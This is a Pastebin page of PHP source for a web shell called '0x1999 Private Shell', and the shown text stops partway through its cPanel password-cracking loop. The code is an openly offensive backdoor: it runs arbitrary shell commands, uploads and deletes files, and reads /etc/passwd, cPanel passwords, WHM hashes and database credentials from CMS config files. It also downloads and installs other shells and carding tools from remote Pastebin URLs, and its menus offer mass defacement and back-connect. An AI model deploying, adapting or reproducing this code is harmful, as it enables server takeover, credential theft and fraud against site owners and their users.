EddieKidiw

0x1999 Private Shell (0x Shell)

Mar 1st, 2019
458
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 100.27 KB | None | 0 0
  1. <?php
  2.  
  3. // 0x1999 Private Shell
  4. // Use your own risk
  5. // Hard coded by 0x1999
  6.  
  7. // Start Bots Locked
  8. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found'); exit; }
  9. // End //Bots Locked
  10.  
  11. // Start configuration
  12. $shell_name = '0x Shell';
  13. $shell_slogan = 'The Next JanCox Shell';
  14. $shell_version = '1.1';
  15. $shell_bypass_security = '0';
  16. $show_error = "0";
  17. @session_start();
  18. @ini_set('max_execution_time',0);
  19. @ini_set('output_buffering',0);
  20. @set_time_limit(0);
  21. // @set_magic_quotes_runtime(0);
  22. // End configuration
  23.  
  24. // start init
  25. if($show_error == "0"){
  26.     @error_reporting(0);
  27.     @error_log(0);
  28.     @ini_set('error_log',NULL);
  29.     @ini_set('log_errors',0);
  30.     @ini_set('display_errors', 0);
  31. } else {
  32.     ini_set('display_errors', 1);
  33.     ini_set('display_startup_errors', 1);
  34.     error_reporting(E_ALL);
  35. }
  36.  
  37.  
  38. if(!function_exists('posix_getegid')) {
  39.   $user = @get_current_user();
  40.   $uid = @getmyuid();
  41.   $gid = @getmygid();
  42.   $group = "?";
  43. } else {
  44.   $uid = @posix_getpwuid(posix_geteuid());
  45.   $gid = @posix_getgrgid(posix_getegid());
  46.   $user = $uid['name'];
  47.   $uid = $uid['uid'];
  48.   $group = $gid['name'];
  49.   $gid = $gid['gid'];
  50. }
  51. if(@is_dir("/home/$user/public_html/")){
  52.     $server_type = "public_html";
  53. } elseif(@is_dir("/var/www/vhosts/")){
  54.     $server_type = "vhost";
  55. } else{
  56.     $server_type = "unknown";
  57. }
  58.  
  59. //end init
  60.  
  61. //start config list
  62. $ext = array("v1","v2","v3","wp","WP","blog","client","clients","forum","forums","home","new","old","site","portal","test","demo","wordpress","joomla","beta","news","main","shop","mage","magento","sites","cms","secure","support","panel","public");
  63. $configtype = array(
  64.     "/wp-config.php" => "Wordpress",
  65.     "/config/koneksi.php" => "Lokomedia",
  66.     "/forum/config.php" => "phpBB",
  67.     "/sites/default/settings.php" => "Drupal",
  68.     "/config/settings.inc.php" => "PrestaShop",
  69.     "/app/etc/local.xml" => "Magento",
  70.     "/admin/config.php" => "OpenCart",
  71.     "/application/config/database.php" => "Ellislab",
  72.     "/configuration.php" => "Joomla",
  73.     "/submitticket.php" => "WHMCS",
  74.     "/config.php" => "OtherConfig",
  75.     "/db.php" => "DB",
  76.     "/db.inc.php" => "DBInc",
  77.     "/database.php" => "Database",
  78.     "/includes/config.php" => "Vbulletin",
  79.     "/db/config.php" => "DBConfig"
  80.  );
  81. //end config list
  82.  
  83. //start head process
  84. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  85.     @ob_clean();
  86.     $file = $_GET['file'];
  87.     header('Content-Description: File Transfer');
  88.     header('Content-Type: application/octet-stream');
  89.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  90.     header('Expires: 0');
  91.     header('Cache-Control: must-revalidate');
  92.     header('Pragma: public');
  93.     header('Content-Length: ' . filesize($file));
  94.     readfile($file);
  95.     exit;
  96. }
  97. if(isset($_GET['dir']) && ($_GET['dir'] != "")){
  98.     $dir = $_GET['dir'];
  99.     chdir($_GET['dir']);
  100. } else {
  101.     $dir = getcwd();
  102. }
  103. if(isset($_POST['upload'])) {
  104.   if(@copy($_FILES['0xfile']['tmp_name'], "$dir/".$_FILES['0xfile']['name']."")){
  105.     $actx = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['0xfile']['name']."</b></i>";
  106.   } else {
  107.     $actx = "<font color=red>failed to upload file</font>";
  108.   }
  109. } else {
  110.     $actx ="";
  111. }
  112. //end head process
  113. ?>
  114.     <!DOCTYPE html>
  115.     <html>
  116.     <style stype="text/css">
  117.         @import url(https://fonts.googleapis.com/css?family=Abel|Baumans);
  118.         body {
  119.             background: #101010;
  120.             color: #f2f2f2;
  121.             font-family: Abel;
  122.             font-size: 12px;
  123.         }
  124.  
  125.         body a {
  126.             color: #3467BA;
  127.             text-decoration: none;
  128.         }
  129.  
  130.         body a:hover {
  131.             text-decoration: underline;
  132.         }
  133.  
  134.         #main_content {
  135.             border: 1px solid #5C7296;
  136.             overflow: hidden;
  137.             width: 1000px;
  138.             height: auto;
  139.             padding: 15px;
  140.             margin: 0 auto;
  141.             background: #0A0A0A;
  142.             border-radius: 6px;
  143.             -moz-border-radius: 6px;
  144.             -webkit-border-radius: 6px;
  145.         }
  146.  
  147.         .enabled {
  148.             color: #7ACC29;
  149.         }
  150.  
  151.         .enabled a {
  152.             color: #7ACC29;
  153.             font-weight: normal;
  154.         }
  155.  
  156.         .disabled {
  157.             color: #CC0000;
  158.         }
  159.  
  160.         .TableHeader_Name {
  161.             width: 400px;
  162.             padding: 0px 0px 0px 5px;
  163.             height: 25px;
  164.             font-family: Abel;
  165.             background-color: #282828;
  166.             border-top-left-radius: 4px;
  167.             -moz-border-top-left-radius: 4px;
  168.             -webkit-border-top-left-radius: 4px;
  169.         }
  170.  
  171.         .TableHeader {
  172.             width: 100px;
  173.             height: 25px;
  174.             font-family: Abel;
  175.             text-align: center;
  176.             background-color: #282828;
  177.         }
  178.  
  179.         .TableHeaderoptions {
  180.             padding: 0px 0px 0px 15px;
  181.             width: 200px;
  182.             height: 25px;
  183.             font-family: Abel;
  184.             background-color: #282828;
  185.             border-top-right-radius: 4px;
  186.             -moz-border-top-right-radius: 4px;
  187.             -webkit-border-top-right-radius: 4px;
  188.         }
  189.  
  190.         .TableLast {
  191.             padding: 0px 0px 0px 15px;
  192.             width: 200px;
  193.             height: 25px;
  194.             font-family: Abel;
  195.             background-color: #282828;
  196.             border-top-right-radius: 4px;
  197.             -moz-border-top-right-radius: 4px;
  198.             -webkit-border-top-right-radius: 4px;
  199.         }
  200.  
  201.         .filesize {
  202.             color: green;
  203.             text-align: center;
  204.         }
  205.  
  206.         .filenames a {
  207.             font-weight: normal;
  208.             text-decoration: none;
  209.         }
  210.  
  211.         .filenames a:hover {
  212.             text-decoration: underline;
  213.         }
  214.  
  215.         .filetr {
  216.             background-color: #080808;
  217.         }
  218.  
  219.         .filetr:hover {
  220.             background-color: #282828;
  221.         }
  222.  
  223.         #options {
  224.             font-weight: 200;
  225.             font-family: Abel;
  226.             margin-left: 10px;
  227.             display: block;
  228.         }
  229.  
  230.         #title {
  231.             font-size: 25px;
  232.             font-family: arial;
  233.             display: block;
  234.             padding: 15px 0px 0px 0px;
  235.         }
  236.  
  237.         .box {
  238.             padding: 10px;
  239.             background-color: #292929;
  240.             border: 1px solid #3467BA;
  241.             height: auto;
  242.             width: 970;
  243.             border-radius: 6px;
  244.             -moz-border-radius: 6px;
  245.             -webkit-border-radius: 6px;
  246.         }
  247.  
  248.         .sembunyi {
  249.             display: none;
  250.             padding: 0;
  251.             margin: 0;
  252.         }
  253.  
  254.         textarea {
  255.             background-color: #010101;
  256.             color: #f2f2f2;
  257.             border: 1px solid #3467BA;
  258.             outline: none;
  259.             font-size: 11px;
  260.             border-radius: 3px;
  261.             -moz-border-radius: 3px;
  262.             -webkit-border-radius: 3px;
  263.             padding: 5px;
  264.             width: 970px;
  265.             height: 400px;
  266.         }
  267.  
  268.         input[type=text],
  269.         input[type=password],
  270.         input[type=submit],
  271.         input[type=button] {
  272.             background: #010101;
  273.             color: #f2f2f2;
  274.             margin: 0 4px;
  275.             border: 1px solid #3467BA;
  276.             outline: none;
  277.             font-size: 11px;
  278.             border-radius: 3px;
  279.             -moz-border-radius: 3px;
  280.             -webkit-border-radius: 3px;
  281.             font-family: Abel;
  282.             font-size: 12px;
  283.         }
  284.  
  285.         .viewfile {
  286.             background: #EDECEB;
  287.             color: #000000;
  288.             margin: 4px 2px;
  289.             padding: 8px;
  290.             border-radius: 3px;
  291.             -moz-border-radius: 3px;
  292.             -webkit-border-radius: 3px;
  293.             border: 1px solid #3467BA;
  294.         }
  295.  
  296.         select {
  297.             color: #f2f2f2;
  298.             padding: 0;
  299.             margin: 0;
  300.             border: 1px solid #3467BA;
  301.             outline: none;
  302.             font-size: 11px;
  303.             border-radius: 3px;
  304.             -moz-border-radius: 3px;
  305.             -webkit-border-radius: 3px;
  306.             background: #010101;
  307.             overflow: hidden;
  308.             font-family: Abel;
  309.             font-size: 12px;
  310.         }
  311.  
  312.         input[type="file"] {
  313.             color: #f2f2f2;
  314.             padding: 0;
  315.             margin: 0;
  316.             border: 1px solid #3467BA;
  317.             outline: none;
  318.             font-size: 11px;
  319.             border-radius: 3px;
  320.             -moz-border-radius: 3px;
  321.             -webkit-border-radius: 3px;
  322.             background: #010101;
  323.             overflow: hidden;
  324.             font-family: Abel;
  325.             font-size: 12px;
  326.         }
  327.  
  328.         .ndelik {
  329.             display: none;
  330.             padding: 0;
  331.             margin: 0;
  332.         }
  333.  
  334.         form,
  335.         table {
  336.             /*display: inline;*/
  337.             margin: 0px;
  338.             padding: 0px;
  339.         }
  340.     </style>
  341.  
  342.     <script type="text/javascript">
  343.         function tukar(lama, baru) {
  344.             document.getElementById(lama).style.display = 'none';
  345.             document.getElementById(baru).style.display = 'block';
  346.         }
  347.     </script>
  348.  
  349.     <link href="http://vignette2.wikia.nocookie.net/regularshow/images/f/fc/Emoticones_-_Pacman.png/revision/latest?cb=20160107170905&amp;path-prefix=es" rel="icon" type="image/x-icon">
  350.  
  351.     <?php
  352.  
  353. $ling ="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
  354. $dir = str_replace("\\","/",$dir);
  355. $scdir = explode("/", $dir);
  356. $ds = @ini_get("disable_functions");
  357. $show_ds = (!empty($ds)) ? "<input type='text' name='searchterm' size='30'style='background-color: rgb(41, 41, 41);border: 1px solid rgb(41, 41, 41);height: 12px;color: red;width: 385px;'value='$ds'readonly/>" : "<font color=lime>NONE</font>";
  358. echo "<title>$shell_name</title>";
  359.  
  360. if(isset($_GET['create'])){
  361.     function CreateTools($names,$lokasi){
  362.     if ( $_GET['create'] == $names ){
  363.         $a= "".$_SERVER['SERVER_NAME']."";
  364. $b= dirname($_SERVER['PHP_SELF']);
  365. $c = "/0x1/".$names.".php";
  366. if (file_exists('0x1/'.$names.'.php')){
  367.     echo '<script type="text/javascript">alert("Done");window.location.href = "0x1/'.$names.'.php";</script> ';
  368.     }
  369.     else {mkdir("0x1", 0777);
  370. file_put_contents('0x1/'.$names.'.php', file_get_contents($lokasi));
  371. echo ' <script type="text/javascript">alert("Done");window.location.href = "0x1/'.$names.'.php";</script> ';}}
  372. }
  373. CreateTools("wso","http://pastebin.com/raw/3eh3Gej2");
  374. CreateTools("adminer"."https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
  375. CreateTools("b374k","http://pastebin.com/raw/rZiyaRGV");
  376. CreateTools("injection","http://pastebin.com/raw/nxxL8c1f");
  377. CreateTools("promailerv2","http://pastebin.com/raw/Rk9v6eSq");
  378. CreateTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
  379. CreateTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
  380. CreateTools("tokopedia","http://pastebin.com/dvhzWgby");
  381. CreateTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ");
  382. CreateTools("mailer","http://pastebin.com/raw/9yu1DmJj");
  383. CreateTools("r57","http://pastebin.com/raw/G2VEDunW");
  384. CreateTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
  385. CreateTools("extractor","http://pastebin.com/raw/jQnMFHBL");
  386. CreateTools("bh","http://pastebin.com/raw/3L2ESWeu");
  387. CreateTools("dhanus","http://pastebin.com/raw/v4xGus6X");
  388. }
  389.    
  390. //Start Function
  391. function permissions($file){
  392.  
  393. $perms = @fileperms($file);
  394. if (($perms & 0xC000) == 0xC000) {
  395. $info = 's';
  396. } elseif (($perms & 0xA000) == 0xA000) {
  397. $info = 'l';
  398. } elseif (($perms & 0x8000) == 0x8000) {
  399. $info = '-';
  400. } elseif (($perms & 0x6000) == 0x6000) {
  401. $info = 'b';
  402. } elseif (($perms & 0x4000) == 0x4000) {
  403. $info = 'd';
  404. } elseif (($perms & 0x2000) == 0x2000) {
  405. $info = 'c';
  406. } elseif (($perms & 0x1000) == 0x1000) {
  407. $info = 'p';
  408. } else {
  409. $info = 'u';
  410. }
  411. $info .= (($perms & 0x0100) ? 'r' : '-');
  412. $info .= (($perms & 0x0080) ? 'w' : '-');
  413. $info .= (($perms & 0x0040) ?
  414. (($perms & 0x0800) ? 's' : 'x' ) :
  415. (($perms & 0x0800) ? 'S' : '-'));
  416. $info .= (($perms & 0x0020) ? 'r' : '-');
  417. $info .= (($perms & 0x0010) ? 'w' : '-');
  418. $info .= (($perms & 0x0008) ?
  419. (($perms & 0x0400) ? 's' : 'x' ) :
  420. (($perms & 0x0400) ? 'S' : '-'));
  421. $info .= (($perms & 0x0004) ? 'r' : '-');
  422. $info .= (($perms & 0x0002) ? 'w' : '-');
  423. $info .= (($perms & 0x0001) ?
  424. (($perms & 0x0200) ? 't' : 'x' ) :
  425. (($perms & 0x0200) ? 'T' : '-'));
  426. return $info;
  427. }
  428. function UrlLoop($url,$type){
  429.   $urlArray = array();
  430.   $ch = curl_init();
  431.   curl_setopt($ch, CURLOPT_URL, $url);
  432.   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  433.   $result = curl_exec($ch);
  434.   $regex='|<a.*?href="(.*?)"|';
  435.   preg_match_all($regex,$result,$parts);
  436.   $links = $parts[1];
  437.   foreach($links as $link){
  438.     array_push($urlArray, $link);
  439.   }
  440.   curl_close($ch);
  441.   foreach($urlArray as $value){
  442.     $lol = "$url$value";
  443.     if(preg_match("#$type#is", $lol)) {
  444.       echo "$lol\r\n";
  445.     }
  446.   }
  447. }
  448.  
  449. function anucurl($sites) {
  450.     $ch = curl_init($sites);
  451.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  452.           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  453.           curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  454.           curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  455.           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  456.           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  457.           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  458.           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  459.           curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  460.     $data = curl_exec($ch);
  461.           curl_close($ch);
  462.     return $data;
  463. }
  464. function clearspace($text){
  465.     return str_replace(" ","_",$text);
  466. }  
  467. function magicboom($text){
  468.     if (!get_magic_quotes_gpc()) {
  469.          return $text;
  470.     }
  471.     return stripslashes($text);
  472. }
  473. function ambilKata($param, $kata1, $kata2){
  474.   if(strpos($param, $kata1) === FALSE) return FALSE;
  475.   if(strpos($param, $kata2) === FALSE) return FALSE;
  476.   $start = strpos($param, $kata1) + strlen($kata1);
  477.   $end = strpos($param, $kata2, $start);
  478.   $return = substr($param, $start, $end - $start);
  479.   return $return;
  480. }
  481. function ambil_password($link) {
  482.   $pass = "";
  483.   $ambil = file_get_contents($link);
  484.   if(preg_match("/WordPress/", $ambil)) {
  485.     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  486.   } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  487.     $pass .= ambilkata($ambil,"password = '","'")."\n";
  488.   } elseif(preg_match("/cmsmember/", $ambil)) {
  489.     $pass .= ambilkata($ambil,'dbpasswd = "','"')."\n";
  490.   } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  491.     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  492.   } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  493.     $pass .= ambilkata($ambil,'password = "','"')."\n";
  494.   } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  495.     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  496.   } elseif(preg_match("/client/", $ambil)) {
  497.     preg_match("/password=(.*)/", $ambil, $pass1);
  498.     if(preg_match('/"/', $pass1[1])) {
  499.       $pass1[1] = str_replace('"', "", $pass1[1]);
  500.       $pass .= $pass1[1]."\n";
  501.     }
  502.   } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  503.     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  504.   }
  505.   return $pass;
  506. }
  507. function w($dir,$perm) {
  508.   if(!is_writable($dir)) {
  509.         return "<font color=red>".$perm."</font>";
  510.     } else {
  511.         return "<font color=lime>".$perm."</font>";
  512.     }
  513. }
  514. function cekjum($kentu){
  515.  
  516.  
  517.     // $it = new RecursiveIteratorIterator($kentu,RecursiveDirectoryIterator::SKIP_DOTS);
  518.     $it = new RecursiveIteratorIterator
  519.     (
  520.         new RecursiveDirectoryIterator($kentu)
  521.     );
  522.     // if($it-> DirectoryIterator::isDot()){
  523.     //  echo "cok";
  524.     // }
  525.  
  526.     // $index = array_search('..',$it);
  527.     // if($index !== FALSE){
  528.     //     unset($it[$index]);
  529.     // }
  530.  
  531.  
  532.   foreach ($it as $filename) {
  533.     $file=realpath(dirname($filename));
  534.     if($file == ".."){
  535.         continue;
  536.     }
  537.     if (is_writable($filename)){
  538.  
  539. $perm = permissions($file);
  540. $perm = w($file,$perm);
  541. $permd = permissions($filename);
  542. $permd = w($filename,$permd);
  543.  
  544.       if(is_dir($filename)){
  545.         if(is_writable($file)){
  546.           echo "[ D ] [$perm]\t\t<a href='?dir=$file'>$file</a><font color='lime'>is writable</font><br>";
  547.         }
  548.       }
  549.         else {
  550.             if(is_writable($filename)){
  551.           echo "[ F ] [$permd]\t\t<a href='?act=edit&dir=$file&file=$filename'>$filename</a><font color='lime'>is writable</font><br>";
  552.         }
  553.     }
  554.  
  555.       }
  556.   }
  557. }
  558. function exe($cmd) {    
  559. if(function_exists('system')) {        
  560.         @ob_start();       
  561.         @system($cmd);     
  562.         $buff = @ob_get_contents();        
  563.         @ob_end_clean();       
  564.         return $buff;  
  565.     } elseif(function_exists('exec')) {        
  566.         @exec($cmd,$results);      
  567.         $buff = "";        
  568.         foreach($results as $result) {         
  569.             $buff .= $result;      
  570.         } return $buff;    
  571.     } elseif(function_exists('passthru')) {        
  572.         @ob_start();       
  573.         @passthru($cmd);       
  574.         $buff = @ob_get_contents();        
  575.         @ob_end_clean();       
  576.         return $buff;  
  577.     } elseif(function_exists('shell_exec')) {      
  578.         $buff = @shell_exec($cmd);     
  579.         return $buff;  
  580.     }
  581. }
  582.  
  583. //End Function
  584.  
  585. //start bypasser
  586.  
  587.  
  588. // $etcpasswd = etcpasswd();
  589.  
  590. $etcpasswd = @file_get_contents('/etc/passwd');
  591. if(!$etcpasswd){
  592.     $etcpasswd = exe('cat /etc/passwd');
  593. }        
  594. // end bypasser
  595.  
  596.  
  597.  
  598. /////////////////////////////////////
  599.  
  600. $sport = $_SERVER['SERVER_PORT'];
  601. $d0mains = @file("/etc/named.conf");
  602. $users=@file('/etc/passwd');
  603. if($d0mains){
  604.   $count;
  605.   foreach($d0mains as $d0main){
  606.     if(@ereg("zone",$d0main)){
  607.       preg_match_all('#zone "(.*)"#', $d0main, $domains);
  608.       flush();
  609.       if(strlen(trim($domains[1][0])) > 2){
  610.         flush();
  611.         $count++;
  612.       }
  613.     }
  614.   }
  615.   $count2=$count/2;
  616. } else {
  617.     $count2="??";
  618. }
  619. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  620. echo "
  621.     <body>
  622.     <div id='main_content'><span id='title'><font face='Baumans'>$shell_name</font> </span><i>$shell_slogan</i><br><br><div class='box'>
  623. ";
  624. echo'
  625. <table  cellspacing="0" cellpadding="0">
  626. <colgroup>
  627. <col style="width: 499px">
  628. <col style="width: 599px">
  629. </colgroup>
  630.  <tr>
  631.    <td nowrap>Server Name:'.php_uname().'</td>
  632. <td align="right"><form><div class="select-style">
  633. <select onchange="if (this.value) window.open(this.value);">
  634.   <option selected="selected" value=""> <i>Tools Creator </option>
  635.   <option value="'.$ling.'=wso"><i>WSO 2.8.1</option>
  636.   <option value="'.$ling.'=injection"><i>1n73ction v3</option>
  637.   <option value="'.$ling.'=wk">WHMCS Killer</option>
  638.   <option value="'.$ling.'=adminer">Adminer</option>
  639.   <option value="'.$ling.'=b374k">b374k Shell</option>
  640.   <option value="'.$ling.'=b374k323">b374k 3.2</option>  
  641.   <option value="'.$ling.'=bh">BlackHat Shell</option>      
  642.   <option value="'.$ling.'=dhanus">Dhanush Shell</option>    
  643.   <option value="'.$ling.'=r57">R57 Shell</option>    
  644. <option value="'.$ling.'=encodedecode">Encode Decode</option>    
  645. <option value="'.$ling.'=r57">R57 Shell</option>    
  646. </select>
  647. <select onchange="if (this.value) window.open(this.value);">
  648.   <option selected="selected" value=""> Tools Carder </option>
  649.   <option value="'.$ling.'=extractor">DB Email Extractor</option>
  650.   <option value="'.$ling.'=promailerv2">Pro Mailer V2</option>    
  651.   <option value="'.$ling.'=bukalapak">BukaLapak Checker</option>        
  652.   <option value="'.$ling.'=tokopedia">TokoPedia Checker</option>  
  653.   <option value="'.$ling.'=tokenpp">Paypal Token Generator</option>  
  654.   <option value="'.$ling.'=mailer">Mailer</option>  
  655.   <option value="'.$ling.'=gamestopceker">GamesTop Checker</option>
  656.   </select></div>
  657. <noscript><input type="submit" value="Submit"></noscript>
  658. </form></td>
  659.  </tr>
  660.  <tr>
  661.    <td>User :<font color=lime>'.$user.'</font> ('.$uid.') Group : <font color=lime>'.$group.'</font> ('.$gid.')</td>
  662.    <td align="right">';
  663.     if($server_type == "public_html"){
  664.     if (file_exists('/home/'.$user.'/.my.cnf')){
  665.       $cp = file_get_contents('/home/'.$user.'/.my.cnf');
  666.           $cp = ambilkata($cp,'password="','"');
  667.       echo 'Cpanel : Username <font color="lime">(</font>'.$user.'<font color="lime">)</font> Password <font color="lime">(</font>'.$cp.'<font color="lime">)</font>';
  668.     }}
  669.     echo '
  670.    </td>
  671.    </tr>
  672.    <tr>
  673.    <td>Server IP :<font color=lime>'.gethostbyname($_SERVER["HTTP_HOST"]).'</font>  <span class="enabled"><a href="https://www.bing.com/search?q=IP:'.gethostbyname($_SERVER["HTTP_HOST"]).'" target="_blank">[BING]</a></span> <span class="enabled"><a href="https://centralops.net/co/domaindossier.aspx?addr='.gethostbyname($_SERVER["HTTP_HOST"]).'&dom_whois=true&dom_dns=true&traceroute=true&net_whois=true&svc_scan=true" target="_blank">[Dossier]</a></span> | Port : <font color=lime>'.$sport.'</font> | Your IP: <font color=lime>'.$_SERVER["REMOTE_ADDR"].'</font></td>
  674.     <td align="right">';
  675.   if($server_type == "public_html"){
  676.     if (file_exists('/home/'.$user.'/.accesshash')){
  677.     $whm = file_get_contents('/home/'.$user.'/.accesshash');
  678.         $whm = preg_replace( '/\s+/' , '' , $whm );
  679.         echo '<input type="text" size="30" value="WHM '.$user.':'.$whm.'">';
  680.   } }
  681.   echo '
  682.  </td>
  683.  </tr>
  684.  <tr>
  685.    <td>Server Type : '.$server_type.' | Website :<font color=lime> '.$count2.' </font> Domains</td>
  686.  </tr>
  687.  <tr>
  688.    <td>Safe Mode: '.$sm.'</td>
  689.  </tr>
  690.  <tr>
  691.    <td>Disable Functions:'.$show_ds.'</td>
  692.  </tr>
  693.  <tr>
  694.    <td>Server Software: '.$_SERVER["SERVER_SOFTWARE"].' <span class="enabled"><a href="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description='.$_SERVER["SERVER_SOFTWARE"].'&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=" target="_blank">[Exploit DB]</a></span>
  695.     </td>
  696.  </tr>
  697.  <tr>
  698.    <td>Directory : ';
  699.     foreach($scdir as $c_dir => $cdir) {
  700.     echo "<a href='?dir=";
  701.     for($i = 0; $i <= $c_dir; $i++) {
  702.         echo $scdir[$i];
  703.         if($i != $c_dir) {
  704.         echo "/";
  705.         }
  706.       }
  707.     echo "'>$cdir</a>/";
  708.   }
  709.     echo"</td>
  710.     <td align='right'><form method='post' enctype='multipart/form-data'><input type='file' name='0xfile'><input type='submit' value='upload' name='upload'></form></td>
  711.  </tr>
  712.  <tr>
  713.    <td><form method='post' action='?dir=$dir&do=cmd' style='float: left;'>
  714.    Command :
  715.    <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  716.    </form><p></p>
  717.     </td>
  718.     <td align='right'>".$actx."</td>
  719.  </tr>
  720. </table></div>";
  721. echo '<a href="?">Home</a> / ';
  722. echo "<a href='?dir=".$dir."&do=config'>Config</a> / ";
  723. echo "<a href='?dir=".$dir."&do=jump'>Jump</a> / ";
  724. echo "<a href='?dir=".$dir."&do=symlink'>Sym</a> / ";
  725. echo "<a href='?dir=".$dir."&do=cpanel'>Cpanel</a> / ";
  726. echo "<a href='?dir=".$dir."&do=symlink'>Sym</a> / ";
  727. echo "<a href='?dir=".$dir."&do=mass_deface'>Mass</a> / ";
  728. echo "<a href='?dir=".$dir."&do=mirror'>Mirror</a> / ";
  729. echo "<a href='?dir=".$dir."&do=cgi'>Cgi</a> / ";
  730. echo "<a href='?dir=".$dir."&do=bc'>BC</a> / ";
  731. echo "<a href='?dir=".$dir."&do=about'>About</a> / ";
  732. echo "<a href='?dir=".$dir."&do=serverinfo'>Server Info</a> / ";
  733. echo "<a href='?do=deleteme'>Self Remove</a> / ";
  734. echo "<a href='?dir=".$dir."&do=ndelikne'>Hidden Shell</a> / ";
  735. echo "<a href='?dir=".$dir."&do=crp'>Config ResPass</a> / ";
  736. echo "<a href='?dir=".$dir."&do=grabpass'>Auto CU Joomla</a> / ";
  737. echo "<a href='?dir=".$dir."&do=hek'>Deface</a> / ";
  738. echo '<hr>';   
  739. /////////////////////////////////////
  740. // if(isset($_GET['act']) && ($_GET['act'] == ''))
  741.  
  742.  
  743.  
  744. // START TOOLS SCRIPT
  745. if(isset($_GET['act']) && ($_GET['act'] == 'delete')) {
  746.     $delete = unlink($_GET['file']);
  747.     if($delete) {
  748.         $act = "<script>window.location='?dir=".$dir."';</script>";
  749.     } else {
  750.         $act = "<font color=red>permission denied</font>";
  751.     }
  752.     echo $act;
  753. }
  754.  
  755. elseif(isset($_GET['act']) && ($_GET['act'] == 'delete_dir')) {
  756.     function Delete($path)
  757. {
  758.   $path = (substr($path,-1)=='/') ? $path:$path.'/';
  759.     $dh  = opendir($path);
  760.   while ( ($item = readdir($dh) ) !== false) {
  761.     $item = $path.$item;
  762.     if ( (basename($item) == "..") || (basename($item) == ".") )
  763.       continue;
  764.     $type = filetype($item);
  765.     if ($type == "dir")
  766.       Delete($item);
  767.     else
  768.       @unlink($item);
  769.   }
  770.   closedir($dh);
  771.   @rmdir($path);}
  772.   $delete_dir = Delete($dir);
  773.   $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  774.   echo $act;
  775. }
  776. elseif(isset($_POST['do_rename'])) {
  777.   $rename = rename($_POST['oldname'], "$dir/".htmlspecialchars($_POST['rename'])."");
  778.   if($rename) {
  779.     $act = "<script>window.location='?dir=".$dir."';</script>";
  780.   } else {
  781.     $act = "<font color=red>permission denied</font>";
  782.   }
  783.   echo "".$act."<br>";
  784. }
  785. elseif(isset($_POST['dir_rename'])) {
  786.   $dir_rename = rename($dir."/".$_POST['oldname'], "".$dir."/".htmlspecialchars($_POST['fol_rename'])."");
  787.   if($dir_rename) {
  788.     $act = "<script>window.location='?dir=".$dir."';</script>";
  789.   } else {
  790.     $act = "<font color=red>permission denied</font>";
  791.   }
  792.   echo "".$act."<br>";
  793. }
  794. elseif(isset($_GET['act']) && ($_GET['act'] == 'newfolder')) {
  795.   if($_POST['new_save_folder']) {
  796.     $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  797.     if(!mkdir($new_folder)) {
  798.       $act = "<font color=red>permission denied</font>";
  799.     } else {
  800.       $act = "<script>window.location='?dir=".$dir."';</script>";
  801.     }
  802.   }
  803.   echo $act;
  804. }
  805. elseif(isset($_GET['act']) && ($_GET['act'] == 'view')) {
  806.   if(is_file($_GET['file'])){
  807.     if(!isset($file)) $file = magicboom($_GET['file']);
  808.     echo "Filename : <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  809.         echo "<div class=\"viewfile\">";
  810.         $file = wordwrap(@file_get_contents($file),"240","\n");
  811.         @highlight_string($file);
  812.         echo "</div>";
  813. }elseif(is_dir($_GET['view'])){
  814.   echo showdir($dir,$prompt);
  815. }  
  816. }
  817.  
  818.  
  819. //end act
  820.  
  821. elseif(isset($_GET['do']) && ($_GET['do'] == 'cpanel')) {
  822.   if($_POST['crack']) {
  823.     $usercp = explode("\r\n", $_POST['user_cp']);
  824.     $passcp = explode("\r\n", $_POST['pass_cp']);
  825.     $i = 0;
  826.     foreach($usercp as $ucp) {
  827.       foreach($passcp as $pcp) {
